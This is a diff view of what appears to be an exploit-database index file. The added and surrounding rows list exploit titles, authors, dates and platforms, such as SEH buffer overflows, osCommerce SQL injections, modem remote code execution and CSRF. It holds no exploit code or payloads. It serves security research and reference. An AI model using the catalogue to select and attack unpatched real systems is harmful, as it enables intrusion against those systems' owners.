46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
|
||||
46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -10279,6 +10280,7 @@ id,file,description,date,author,type,platform,port
|
|||
46288,exploits/windows/local/46288.py,"R 3.5.0 - Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
|
||||
46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
|
||||
46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
|
||||
46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -40794,3 +40796,6 @@ id,file,description,date,author,type,platform,port
|
|||
46325,exploits/hardware/webapps/46325.txt,"devolo dLAN 550 duo+ Starter Kit - Remote Code Execution",2019-02-05,sm,webapps,hardware,
|
||||
46326,exploits/hardware/webapps/46326.html,"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery",2019-02-05,"Yusuf Furkan",webapps,hardware,80
|
||||
46327,exploits/java/webapps/46327.txt,"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization",2019-02-05,"Bishop Fox",webapps,java,
|
||||
46328,exploits/php/webapps/46328.txt,"osCommerce 2.3.4.1 - 'currency' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
46329,exploits/php/webapps/46329.txt,"osCommerce 2.3.4.1 - 'products_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue